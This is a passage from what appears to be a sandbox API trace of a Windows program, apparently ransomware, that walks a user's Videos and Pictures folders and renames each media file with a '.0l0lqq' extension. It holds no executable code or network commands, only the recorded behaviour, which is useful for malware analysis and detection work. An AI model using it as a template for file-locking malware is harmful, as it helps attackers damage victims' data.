HALPmcxz\\Videos\\IbjElj86_BfHmLV\\0Qxy0vXxZJSJvqnfO\\LCnCcwPa.avi", lpFilePart=0x0) returned 0x53 [0254.448] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\0Qxy0vXxZJSJvqnfO\\LCnCcwPa.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ibjelj86_bfhmlv\\0qxy0vxxzjsjvqnfo\\lcnccwpa.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\0Qxy0vXxZJSJvqnfO\\LCnCcwPa.avi.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ibjelj86_bfhmlv\\0qxy0vxxzjsjvqnfo\\lcnccwpa.avi.0l0lqq")) returned 1 [0254.458] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\0Qxy0vXxZJSJvqnfO\\YUQCFjiyrqlKt.avi", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\0Qxy0vXxZJSJvqnfO\\YUQCFjiyrqlKt.avi", lpFilePart=0x0) returned 0x58 [0254.472] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\0Qxy0vXxZJSJvqnfO\\YUQCFjiyrqlKt.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ibjelj86_bfhmlv\\0qxy0vxxzjsjvqnfo\\yuqcfjiyrqlkt.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\0Qxy0vXxZJSJvqnfO\\YUQCFjiyrqlKt.avi.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ibjelj86_bfhmlv\\0qxy0vxxzjsjvqnfo\\yuqcfjiyrqlkt.avi.0l0lqq")) returned 1 [0254.474] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\0Qxy0vXxZJSJvqnfO\\ZeqUbl3NU5FSo3-Lx_Qg.avi", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\0Qxy0vXxZJSJvqnfO\\ZeqUbl3NU5FSo3-Lx_Qg.avi", lpFilePart=0x0) returned 0x5f [0254.479] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\0Qxy0vXxZJSJvqnfO\\ZeqUbl3NU5FSo3-Lx_Qg.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ibjelj86_bfhmlv\\0qxy0vxxzjsjvqnfo\\zequbl3nu5fso3-lx_qg.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\0Qxy0vXxZJSJvqnfO\\ZeqUbl3NU5FSo3-Lx_Qg.avi.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ibjelj86_bfhmlv\\0qxy0vxxzjsjvqnfo\\zequbl3nu5fso3-lx_qg.avi.0l0lqq")) returned 1 [0254.481] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\-UpgC2Gp0RXK6fa\\-mDD-WeCqyem1BNqZPAp.mp4", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\-UpgC2Gp0RXK6fa\\-mDD-WeCqyem1BNqZPAp.mp4", lpFilePart=0x0) returned 0x5d [0254.484] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\-UpgC2Gp0RXK6fa\\-mDD-WeCqyem1BNqZPAp.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ibjelj86_bfhmlv\\-upgc2gp0rxk6fa\\-mdd-wecqyem1bnqzpap.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\IbjElj86_BfHmLV\\-UpgC2Gp0RXK6fa\\-mDD-WeCqyem1BNqZPAp.mp4.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ibjelj86_bfhmlv\\-upgc2gp0rxk6fa\\-mdd-wecqyem1bnqzpap.mp4.0l0lqq")) returned 1 [0254.487] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0wbj4DWbp2nx\\BLBxjd8iw.mp4", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0wbj4DWbp2nx\\BLBxjd8iw.mp4", lpFilePart=0x0) returned 0x3f [0254.490] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0wbj4DWbp2nx\\BLBxjd8iw.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0wbj4dwbp2nx\\blbxjd8iw.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0wbj4DWbp2nx\\BLBxjd8iw.mp4.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0wbj4dwbp2nx\\blbxjd8iw.mp4.0l0lqq")) returned 1 [0254.492] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0wbj4DWbp2nx\\F1pz8PvSB-PAv gc.mp4", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0wbj4DWbp2nx\\F1pz8PvSB-PAv gc.mp4", lpFilePart=0x0) returned 0x46 [0254.498] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0wbj4DWbp2nx\\F1pz8PvSB-PAv gc.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0wbj4dwbp2nx\\f1pz8pvsb-pav gc.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0wbj4DWbp2nx\\F1pz8PvSB-PAv gc.mp4.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0wbj4dwbp2nx\\f1pz8pvsb-pav gc.mp4.0l0lqq")) returned 1 [0254.499] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0wbj4DWbp2nx\\HGQSZibcGffjC.avi", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0wbj4DWbp2nx\\HGQSZibcGffjC.avi", lpFilePart=0x0) returned 0x43 [0254.502] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0wbj4DWbp2nx\\HGQSZibcGffjC.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0wbj4dwbp2nx\\hgqszibcgffjc.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0wbj4DWbp2nx\\HGQSZibcGffjC.avi.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0wbj4dwbp2nx\\hgqszibcgffjc.avi.0l0lqq")) returned 1 [0254.510] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0wbj4DWbp2nx\\yXBcXchbNJ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0wbj4dwbp2nx\\yxbcxchbnj.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0wbj4DWbp2nx\\yXBcXchbNJ.mkv.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0wbj4dwbp2nx\\yxbcxchbnj.mkv.0l0lqq")) returned 1 [0254.513] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0wbj4DWbp2nx\\xXl1N1vl4nqbNSCmPLpD\\nCX7VfG3L84o hxeO.avi", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0wbj4DWbp2nx\\xXl1N1vl4nqbNSCmPLpD\\nCX7VfG3L84o hxeO.avi", lpFilePart=0x0) returned 0x5c [0254.521] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0wbj4DWbp2nx\\xXl1N1vl4nqbNSCmPLpD\\nCX7VfG3L84o hxeO.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0wbj4dwbp2nx\\xxl1n1vl4nqbnscmplpd\\ncx7vfg3l84o hxeo.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0wbj4DWbp2nx\\xXl1N1vl4nqbNSCmPLpD\\nCX7VfG3L84o hxeO.avi.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0wbj4dwbp2nx\\xxl1n1vl4nqbnscmplpd\\ncx7vfg3l84o hxeo.avi.0l0lqq")) returned 1 [0254.522] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0wbj4DWbp2nx\\xXl1N1vl4nqbNSCmPLpD\\thhlBs_eG.mp4", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0wbj4DWbp2nx\\xXl1N1vl4nqbNSCmPLpD\\thhlBs_eG.mp4", lpFilePart=0x0) returned 0x54 [0254.526] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0wbj4DWbp2nx\\xXl1N1vl4nqbNSCmPLpD\\thhlBs_eG.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0wbj4dwbp2nx\\xxl1n1vl4nqbnscmplpd\\thhlbs_eg.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0wbj4DWbp2nx\\xXl1N1vl4nqbNSCmPLpD\\thhlBs_eG.mp4.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0wbj4dwbp2nx\\xxl1n1vl4nqbnscmplpd\\thhlbs_eg.mp4.0l0lqq")) returned 1 [0254.532] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1J HKm6Jr1k.png", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1J HKm6Jr1k.png", lpFilePart=0x0) returned 0x36 [0254.537] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1J HKm6Jr1k.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\1j hkm6jr1k.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1J HKm6Jr1k.png.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\1j hkm6jr1k.png.0l0lqq")) returned 1 [0254.543] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2orZXhn0ZDoTQQWQA.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2orzxhn0zdotqqwqa.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2orZXhn0ZDoTQQWQA.gif.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2orzxhn0zdotqqwqa.gif.0l0lqq")) returned 1 [0254.545] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\487L1vcCBYtWi1 V.png", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\487L1vcCBYtWi1 V.png", lpFilePart=0x0) returned 0x3b [0254.548] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\487L1vcCBYtWi1 V.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\487l1vccbytwi1 v.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\487L1vcCBYtWi1 V.png.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\487l1vccbytwi1 v.png.0l0lqq")) returned 1 [0254.550] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cVczQlde.jpg", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cVczQlde.jpg", lpFilePart=0x0) returned 0x33 [0254.560] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cVczQlde.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cvczqlde.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cVczQlde.jpg.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cvczqlde.jpg.0l0lqq")) returned 1 [0254.562] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FlX4uJaBLdO6XALdWi.gif", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FlX4uJaBLdO6XALdWi.gif", lpFilePart=0x0) returned 0x3d [0254.565] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FlX4uJaBLdO6XALdWi.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\flx4ujabldo6xaldwi.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FlX4uJaBLdO6XALdWi.gif.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\flx4ujabldo6xaldwi.gif.0l0lqq")) returned 1 [0254.576] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FsDLgQNzgyjbp.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\fsdlgqnzgyjbp.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FsDLgQNzgyjbp.png.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\fsdlgqnzgyjbp.png.0l0lqq")) returned 1 [0254.579] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FwmDuHV.png", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FwmDuHV.png", lpFilePart=0x0) returned 0x32 [0254.588] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FwmDuHV.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\fwmduhv.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FwmDuHV.png.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\fwmduhv.png.0l0lqq")) returned 1 [0254.599] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\icG1.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\icg1.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\icG1.png.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\icg1.png.0l0lqq")) returned 1 [0254.602] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\t7J0vSM4vwRyUb6NV9qU.jpg", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\t7J0vSM4vwRyUb6NV9qU.jpg", lpFilePart=0x0) returned 0x3f [0254.613] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\t7J0vSM4vwRyUb6NV9qU.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t7j0vsm4vwryub6nv9qu.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\t7J0vSM4vwRyUb6NV9qU.jpg.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t7j0vsm4vwryub6nv9qu.jpg.0l0lqq")) returned 1 [0254.615] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\UpGAKzC7i2l.gif", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\UpGAKzC7i2l.gif", lpFilePart=0x0) returned 0x36 [0254.622] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\UpGAKzC7i2l.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\upgakzc7i2l.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\UpGAKzC7i2l.gif.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\upgakzc7i2l.gif.0l0lqq")) returned 1 [0254.635] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_2Pdy2TQhZbzx.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_2pdy2tqhzbzx.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_2Pdy2TQhZbzx.gif.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_2pdy2tqhzbzx.gif.0l0lqq")) returned 1 [0254.647] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\0KpnDJL.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\0kpndjl.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\0KpnDJL.png.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\0kpndjl.png.0l0lqq")) returned 1 [0254.649] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\7Y65dXFOJX.gif", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\7Y65dXFOJX.gif", lpFilePart=0x0) returned 0x3d [0254.653] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\7Y65dXFOJX.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\7y65dxfojx.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\7Y65dXFOJX.gif.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\7y65dxfojx.gif.0l0lqq")) returned 1 [0254.667] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\8ngAwjMCLvV9BFtzJ5G.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\8ngawjmclvv9bftzj5g.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\8ngAwjMCLvV9BFtzJ5G.png.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\8ngawjmclvv9bftzj5g.png.0l0lqq")) returned 1 [0254.669] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\B8-ABLHyyOhVCqb.gif", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\B8-ABLHyyOhVCqb.gif", lpFilePart=0x0) returned 0x42 [0254.676] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\B8-ABLHyyOhVCqb.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\b8-ablhyyohvcqb.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\B8-ABLHyyOhVCqb.gif.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\b8-ablhyyohvcqb.gif.0l0lqq")) returned 1 [0254.679] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\ey70GB11SXMmw.gif", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\ey70GB11SXMmw.gif", lpFilePart=0x0) returned 0x40 [0254.682] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\ey70GB11SXMmw.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\ey70gb11sxmmw.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\ey70GB11SXMmw.gif.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\ey70gb11sxmmw.gif.0l0lqq")) returned 1 [0254.685] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\F3ZZv.gif", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\F3ZZv.gif", lpFilePart=0x0) returned 0x38 [0254.694] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\F3ZZv.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\f3zzv.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\F3ZZv.gif.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\f3zzv.gif.0l0lqq")) returned 1 [0254.696] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\k-gfzaXH.jpg", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\k-gfzaXH.jpg", lpFilePart=0x0) returned 0x3b [0254.700] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\k-gfzaXH.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\k-gfzaxh.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\k-gfzaXH.jpg.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\k-gfzaxh.jpg.0l0lqq")) returned 1 [0254.703] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\oHJl4LGyDK4Vmfn.gif", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\oHJl4LGyDK4Vmfn.gif", lpFilePart=0x0) returned 0x42 [0254.710] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\oHJl4LGyDK4Vmfn.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\ohjl4lgydk4vmfn.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\oHJl4LGyDK4Vmfn.gif.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\ohjl4lgydk4vmfn.gif.0l0lqq")) returned 1 [0254.718] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\qFRO1ZtVw.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\qfro1ztvw.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\qFRO1ZtVw.png.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\qfro1ztvw.png.0l0lqq")) returned 1 [0254.720] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\r2Xw.jpg", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\r2Xw.jpg", lpFilePart=0x0) returned 0x37 [0254.728] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\r2Xw.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\r2xw.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\r2Xw.jpg.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\r2xw.jpg.0l0lqq")) returned 1 [0254.737] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\SXz1863W6T7xcB6rCBNN.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\sxz1863w6t7xcb6rcbnn.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\SXz1863W6T7xcB6rCBNN.png.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\sxz1863w6t7xcb6rcbnn.png.0l0lqq")) returned 1 [0254.748] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\tA V392y.png", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\tA V392y.png", lpFilePart=0x0) returned 0x3b [0254.753] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\tA V392y.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\ta v392y.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\tA V392y.png.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\ta v392y.png.0l0lqq")) returned 1 [0254.810] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\Vw3N_4l.jpg", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\Vw3N_4l.jpg", lpFilePart=0x0) returned 0x3a [0254.817] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\Vw3N_4l.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\vw3n_4l.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\Vw3N_4l.jpg.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js 